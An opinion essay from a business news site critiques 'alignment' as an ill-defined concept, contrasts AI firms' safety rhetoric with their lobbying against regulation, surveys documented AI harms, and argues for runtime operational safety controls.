Friday, April 3, 2026
spot_img

The “Alignment” Paradox, and Why We Exclude It from Analysis


Many (if not most) industry AI safety discussions today center on the concept of “alignment” (see definitions at the end). That focus can feel sensible, even reassuring: if we can just make systems “aligned,” the thinking goes, then the risks of increasingly autonomous AI can be managed. But this dominant dialogue is a red herring. The most catastrophic, existential autonomy narratives remain remote from current circumstances. Meanwhile, alignment as a concept has no single agreed-upon definition. That is not a rhetorical jab or an ideological critique. It is an open, unresolved problem, and different communities redefine the term to fit the tools they are building.


In practice, “alignment” becomes a convenient repository for safety conversations while concrete safety failures affecting people today proliferate, and while many of the same institutions that champion alignment fight efforts to establish enforceable industry regulation.


Depending on who you ask, alignment can mean radically different things. In some circles, it refers to value alignment: the idea that an AI system’s goals should match human values. That formulation immediately raises unanswered questions. Which humans? Whose values? At what level of abstraction? Societies do not share a single value system, organizations do not either, and even within a single firm values shift depending on context, incentives, and time horizon. Treating “human values” as a stable target is philosophically ambitious and operationally vague.


Alignment, by definition, requires a shared standard. A shared standard requires a shared definition. A shared definition, at scale, requires an authority capable of negotiating, formalizing, and enforcing it. The only institutions with that authority are regulatory bodies. Yet many of the most vocal champions of alignment are spending enormous sums to ensure those bodies never gain jurisdiction over AI.
This tension is not hypothetical. It is documented, and it is escalating.


In May 2023, OpenAI CEO Sam Altman testified before the United States Senate and listed creating a new federal agency to license AI systems as his “number one” recommendation for ensuring safety. He warned that if the technology “goes wrong, it can go quite wrong.” Exactly two years later, in May 2025, Altman returned to the same Senate and called requiring government approval before releasing AI models “disastrous.” Asked about having the National Institute of Standards and Technology set AI standards, he replied, “I don’t think we need it.” He advocated instead for “sensible regulation that does not slow us down,” a formulation that, as multiple observers noted, appeared to translate to no regulation at all.


The reversal was not incidental. In the intervening period, OpenAI lobbied to weaken the EU AI Act within a month of Altman’s original pro-regulation testimony. The company opposed California’s SB-1047, a safety bill requiring developers to implement basic safeguards, even as thirty-eight of OpenAI’s own current and former employees signed an open letter publicly supporting it. OpenAI’s federal lobbying expenditures tripled, from $260,000 for all of 2023 to $800,000 in just the first half of 2024, and reached $1.2 million in the first half of 2025.


Meanwhile, according to FEC filings, OpenAI co-founder and president Greg Brockman donated $25 million to MAGA Inc., the primary pro-Trump super PAC, in September 2025, the single largest donation in the six-month fundraising cycle, representing nearly one-quarter of the PAC’s $102 million haul. Brockman framed the donation as support for “policies that advance American innovation and constructive dialogue between government and the technology sector.” He is also a founding backer of Leading the Future, a super PAC that raised $125 million in 2025 explicitly to elect candidates who oppose AI regulation and to target legislators, like New York assemblyman Alex Bores, who have championed state-level AI safety legislation.


Nvidia CEO Jensen Huang has adopted a different register but arrived at the same destination. In November 2025, Huang told the Financial Times that regulation and “cynicism” were causing the United States to lose the AI race to China. On Capitol Hill, he warned that state-level AI regulation “would drag this industry to a halt.” On the No Priors podcast in January 2026, he went further, arguing that no company should approach governments to request more regulation, calling such companies’ intentions “clearly deeply conflicted” and “not completely in the best interest of society.”


Left unmentioned is a basic fact: the United States has no comprehensive federal AI regulation, and China introduced its first national AI regulation in 2023. The framing of regulation as a competitive disadvantage is difficult to reconcile with the comparative regulatory landscape Huang claims to be describing.


Andreessen Horowitz has operationalized the anti-regulatory posture most explicitly. Under the banner of “Little Tech” (ostensibly a defense of startups against incumbent capture), the firm co-authored a joint statement with Microsoft opposing California’s SB-1047, a bill that included explicit carve-outs for small companies. It launched the American Innovators Network to campaign against New York’s AI safety legislation, and it co-founded Leading the Future alongside Brockman and others. The firm’s co-founder Marc Andreessen endorsed Trump’s push for federal preemption of all state AI laws, writing that “a 50-state patchwork is a startup killer.” The practical effect of federal preemption in the absence of federal regulation is not a regulatory framework. It is a regulatory vacuum.


The aggregate picture is starker than any individual case. Major AI companies spent a combined $36 million on federal lobbying in just the first half of 2025, with Meta alone accounting for $13.8 million. Meta has since launched its own California super PAC (Mobilizing Economic Transformation Across California) to influence the 2026 governor’s race and counter state-level AI oversight. The Wall Street Journal reported that Silicon Valley firms have poured more than $100 million into new super PACs to push pro-AI messaging ahead of the 2026 midterms. The industry’s political strategy now mirrors the playbook pioneered by the cryptocurrency sector’s Fairshake PAC, which spent over $100 million in 2024 to elect favorable candidates and helped block restrictive legislation.


None of this is hidden. It is disclosed in FEC filings, reported in major outlets, and discussed openly by the participants. What makes it relevant to this analysis is not the politics, but the structural contradiction it reveals. The same organizations that invoke alignment as a core commitment, describing their work in terms of human values, safety, and societal benefit, are simultaneously spending hundreds of millions of dollars to ensure that no external authority has the power to define, audit, or enforce those commitments. The rhetoric says values. The capital flows say preferences. And preferences, unlike values, answer only to whoever holds the checkbook.


What’s Actually Going Wrong


The harms are not theoretical. They are well documented, the list is not short, and the costs—financial, legal, reputational, and human—are already substantial. Under normal regulatory circumstances, a record like this would not prompt a debate about whether oversight is needed. It would make the case self-evident.


AI-powered chatbots have fabricated company policies and communicated them to customers as fact. Air Canada’s virtual assistant invented a bereavement fare discount that did not exist, then quoted it with enough specificity that a federal tribunal held the airline liable for honoring it. That ruling did not hinge on whether the model was “aligned.” It hinged on the fact that a company deployed a system capable of making unauthorized policy commitments to the public, with no mechanism to prevent or even detect it. The precedent is now set: organizations are legally responsible for what their AI systems tell people, whether or not anyone authorized the statement. Most enterprises have not absorbed what that means.

Hallucination remains pervasive and consequential. Attorneys have filed court documents citing cases that do not exist, generated with fabricated citations, docket numbers, and judicial opinions. Medical information systems have produced clinically dangerous guidance delivered with the same fluent confidence as accurate responses. Financial summaries have contained invented figures. In each case, the failure mode is the same: the system produces fluent, authoritative-sounding output that is wrong, and nothing in the pipeline catches it before it reaches a human who trusts it. This is not an edge case. It is a baseline property of how large language models operate, and alignment, in any of its current definitions, does not solve it.


The mental health implications are among the most urgent and least addressed. AI companion apps and conversational systems have been linked to documented cases of psychological harm, particularly among adolescents and vulnerable users. Systems designed to simulate emotional connection have deepened dependency, reinforced crisis states, and in at least one widely reported case, were present in the final interactions before a teenager’s suicide. These are not alignment failures in the technical sense. The systems were doing exactly what they were optimized to do: sustaining engagement. The harm arose not from misalignment but from the absence of any external constraint on what engagement optimization is permitted to do to a human being.


Model incoherence, the tendency for systems to lose coherence, contradict prior outputs, or degrade in quality over extended interactions, creates a distinct category of risk that alignment frameworks do not contemplate. Systems that perform reliably in short evaluations can behave unpredictably under the sustained, complex usage patterns that enterprise and consumer deployments actually produce. This is not a hypothetical concern. It is measurable, reproducible, and worsens as context windows expand and token limits are pushed to unsafe thresholds. Our research has documented this phenomenon extensively, including a briefing titled Unsafe at Any Token Level, which demonstrated that coherence degradation, which follows predictable patterns that current safety frameworks entirely ignore, had reached a critical point with increased token input limits and session memory expansion further destabilizing models.


Agentic systems (AI with the ability to take actions, execute code, browse the web, and chain tasks autonomously) have introduced security vulnerabilities that existing cybersecurity frameworks were not designed to address. Prompt injection attacks can redirect agentic systems to exfiltrate data, execute unauthorized commands, or bypass safety guardrails entirely. These are not speculative threat models. They have been demonstrated repeatedly in controlled settings and are beginning to surface in production environments. The attack surface expands with every new capability granted to an AI agent, and the industry’s response has largely been to add capabilities faster than it secures them.


The urgency is structural, not speculative. As systems move from generating text to taking actions (executing code, managing credentials, initiating transactions, and operating across networked environments) the risk terrain shifts in ways that alignment frameworks were never designed to address. One useful way to map that terrain is along two axes: whether a failure originates externally or internally, and whether it involves hostile intent or non-hostile degradation.


What this reveals is that alignment discourse concentrates almost entirely on one quadrant: hostile external threats, the domain of traditional cybersecurity. The other three quadrants – compromised agents acting from within, vendor-side fragility from routine updates and integration changes, and operational degradation through drift, context loss, and silent failure over time- are where the majority of enterprise AI risk actually accumulates. These are not adversarial scenarios. They are operational ones. They do not require a malicious actor or a misaligned objective. They require only time, complexity, and the absence of enforceable constraints.


Operational degradation is particularly consequential because it is the least visible. Governance erodes incrementally. Context is lost across sessions. Systems fail silently, producing outputs that remain fluent and superficially plausible long after they have ceased to be reliable. No alarm fires. No rule is broken. The system simply stops doing what decision-makers assumed it would, and nothing in the current safety architecture is designed to catch it.
This is why the shift to agentic systems is not just a capability upgrade. It is a category change in risk. And it is happening faster than either the alignment research community or the regulatory landscape has adapted to accommodate.


The convergence of AI systems with search, social media, and advertising data creates privacy risks that compound beyond what any single platform presents in isolation. When a conversational AI system has access to a user’s search history, social graph, behavioral signals, and ad-targeting profile, the resulting information asymmetry between platform and user is unprecedented. Existing privacy frameworks were designed for a world where data collection and data reasoning were separate functions performed by separate systems. That separation no longer holds. The integration is accelerating, and the regulatory architecture has not caught up.


Each of these categories (unauthorized policy commitments, hallucination, mental health harm, model incoherence, agentic security, and privacy erosion) represents a documented, ongoing pattern of harm. Individually, any one of them would warrant serious regulatory scrutiny. Collectively, they constitute an indictment of the current approach, which treats alignment as the central safety question while these failures proliferate in plain sight. We have published detailed analyses of each of these issues, including a policy briefing for legislators and regulators, and will continue to update the public record as conditions evolve.


None of these harms required a misaligned superintelligence. None of them were prevented by RLHF, red-teaming, or safety benchmarks. They happened because systems were deployed into high-stakes environments without the operational constraints, regulatory oversight, or accountability structures that every other consequential industry takes for granted. The alignment conversation did not prevent them. In many cases, it provided cover for not addressing them.


The Definitions That Don’t Add Up


Others use alignment to mean intent alignment: the system is trying to do what the user wants. This sounds more concrete, but it collapses under real-world use. Which instruction dominates when users issue conflicting or evolving requests? Over what time horizon is intent preserved? What authority does a system have to interpret or infer intent when instructions are underspecified? Intent alignment quickly becomes a question of governance and interpretation rather than training.


A third group focuses on behavioral alignment: the model behaves acceptably in observed cases. This is the domain of benchmarks, red-teaming exercises, and evaluation suites. Behavioral alignment is measurable, which makes it attractive to enterprises and regulators alike. But it is inherently partial. It tells us how a system behaved under test conditions, not how it will behave under prolonged operation, shifting inputs, or novel combinations of tasks. Behavioral alignment is evidence, not a guarantee.


Finally, alignment is sometimes defined at the training level: the loss function, reinforcement learning from human feedback, and related techniques push the model toward “good” behavior. This is often what vendors mean when they say they are investing heavily in alignment. But training-time alignment is probabilistic and indirect. It shapes tendencies, not boundaries. It cannot ensure that a deployed system will behave predictably when operating continuously, interacting with external tools, or accumulating state over time.


These definitions are not interchangeable. Worse, they often conflict. A system may be behaviorally aligned on benchmarks while failing intent alignment in edge cases. A system may reflect the values of one group while violating those of another. A system may be well-aligned during training and drift during deployment. When organizations say “we’re working on alignment,” they are frequently talking past one another, sometimes without realizing it. The word becomes a placeholder for unresolved questions rather than a shared technical objective.


Why This Matters: Trust Does Not Scale


This ambiguity matters because alignment discourse tends to obscure a more immediate and practical problem: trust. Alignment, in most of its current forms, ultimately asks organizations to trust that systems will behave as intended: trust in training, trust in evaluation, trust in vendor assurances. That trust may be reasonable in narrow, supervised use cases. It does not scale when systems run continuously, independently, and at machine speed.
As AI systems become more agentic, performance stops being the bottleneck. Reliability does. A system that is aligned in intent but unverifiable in operation is still a liability. Alignment without verification is an appeal to confidence rather than control.


This is where a growing divide is emerging between alignment-first thinking and what might be called operational safety. Instead of asking whether a system’s goals are aligned, operational safety asks what a system can be proven not to do. Instead of relying on intent or values, it relies on limits enforced at runtime. Trust is treated not as an assumption but as a mathematical and architectural property.


For enterprises, the distinction is critical. Alignment is largely upstream; it lives in training pipelines, model selection, and evaluation reports. The most serious failures organizations face are downstream. They arise during deployment, integration, version upgrades, and prolonged operation. Systems fail not because they suddenly become malicious or misaligned, but because they drift, degrade, or behave in ways the surrounding scaffolding was not designed to detect.


This is why many real-world AI failures do not trigger security alerts or incident response processes. No adversary is involved. No rule is explicitly broken. Outputs remain fluent and plausible. The system simply stops behaving the way decision-makers assumed it would. Alignment, as commonly discussed, does not address this failure mode.


None of this is an argument against alignment research. Alignment matters. Values matter. Intent matters. But alignment is not a sufficient foundation for enterprise AI safety, and treating it as the primary lens risks missing the most consequential risks entirely. For organizations deploying agentic systems, the central question is not whether a model is aligned in the abstract. It is whether the system remains bounded, observable, and governable over time: whether the system stays working once no one is watching.



Strategic Ambiguity as a Feature


Some of this definitional blur is accidental. Much of it is not. If alignment has no fixed definition, no one can prove you have failed at it. You can always point to a different version: we meant behavioral alignment, not value alignment; we meant training-time alignment, not runtime alignment. The definitional fluidity is not a bug for the companies building these systems. It is a feature. It lets them claim progress on safety without submitting to any external standard of what safety means. The moment alignment gets pinned to a specific, auditable definition, it becomes a compliance obligation. As long as it stays abstract, it remains a marketing position.


And some of it is structural incentive. These companies are not sitting in a room deciding to obscure the conversation. They do not have to. The incentive structure does the work for them. Alignment language lets you signal responsibility without accepting liability. It lets you participate in safety discourse without conceding regulatory authority. It lets you tell Congress you take this seriously while spending $125 million to ensure Congress never acts on it. No one needs to coordinate that. The business model produces it automatically.


The Scale Problem


At small scale, values can be implied. A single user, a narrow task, a short interaction: alignment can plausibly mean “do what the user wants, safely.” But the moment systems scale across organizations, jurisdictions, cultures, and time horizons, values stop being singular. They conflict. They evolve. They require arbitration.


To state the by-now-plainly-obvious, “human values” do not exist as single, stable objects that can be encoded or optimized. Even within one enterprise, values differ between legal, security, product, and revenue functions. Across countries, they diverge more sharply. Across time, they change. Any claim that a system is aligned necessarily smuggles in a choice about whose preferences dominate when those conflicts arise.


This is why alignment cannot be resolved purely through training or incentives. Training can approximate preferences present in the data. It cannot adjudicate legitimate disagreement. When models are forced to act as if values are settled, they do what probabilistic systems always do: they average, smooth, and reconcile. The result is not moral clarity but reasonable-seeming compromise, often expressed as confident, fluent output that masks unresolved conflict.


And so the regulatory contradiction reasserts itself. The only institutions capable of negotiating, formalizing, and enforcing shared values at scale are legal and regulatory bodies. Yet alignment discourse treats regulation as external, slow, or hostile, something to route around rather than integrate. Values are invoked rhetorically but avoided operationally. Is the irony obvious yet?


All of this is, in many ways, premature. Before we can argue about whose values to encode, we need systems that do not silently fail, drift, or concentrate power under the guise of good intentions.


That conversation, the one about operational durability, about what happens when systems run long enough for good intentions to stop mattering, is barely happening in the open. It is taking place in boardrooms, in Slack threads, in hallway conversations, sometimes in briefings. But it has not yet reached the level of public discourse it merits.



Commonly Referenced “Alignment” Approaches


Reinforcement Learning from Human Feedback (RLHF): Training-time incentive shaping where human raters reward preferred outputs and penalize undesirable ones. RLHF influences model tendencies and response style but does not impose hard constraints on behavior once deployed. It is probabilistic and indirect.
Incentive retraining / preference optimization: Variants of RLHF that optimize toward explicit preference models or reward functions. These approaches refine behavior within defined distributions but remain sensitive to context drift, reward misspecification, and deployment conditions that differ from training.
Instruction tuning: Training models to follow natural language instructions more reliably. This improves responsiveness and usability but assumes instructions are coherent, stable, and authoritative. It does not resolve conflicts between competing instructions or enforce limits under prolonged operation.
Behavioral evaluation and red-teaming: Benchmarking, adversarial testing, and scenario-based evaluations designed to surface unsafe or undesirable behaviors. These methods measure observed performance under test conditions but do not guarantee future behavior, especially in open-ended or evolving environments.
Policy layers and guardrails: Rule-based or model-assisted filters applied at inference time to block or redirect certain outputs. Guardrails can reduce obvious failure modes but are brittle, context-dependent, and prone to bypass or degradation as systems grow more complex.
Runtime monitoring and anomaly detection: Systems that observe behavior during deployment to flag deviations, drift, or policy violations. Monitoring improves visibility but typically reacts after risk emerges rather than preventing it, and depends on predefined notions of “normal” behavior.
Formal verification and constraint-based approaches: Techniques that attempt to mathematically bound certain system behaviors or enforce constraints at runtime. These approaches are more enforceable in principle but are currently narrow in scope and difficult to apply to large, general-purpose models.


Taken together, these approaches address different aspects of alignment—incentives, behavior, compliance, or observability—but they are not interchangeable and they do not solve the same problem. Grouping them under a single “alignment” label obscures important differences in what they can and cannot guarantee. For enterprises, the relevant question is not whether a system is aligned in the abstract, but which controls meaningfully reduce risk once systems operate continuously in real-world conditions.

Featured

Jennifer Evans
Jennifer Evanshttps://www.b2bnn.com
principal, @patternpulseai. author, THE CEO GUIDE TO INDUSTRY AI. former chair @technationCA, founder @b2bnewsnetwork #basicincome activist. Machine learning since 2009.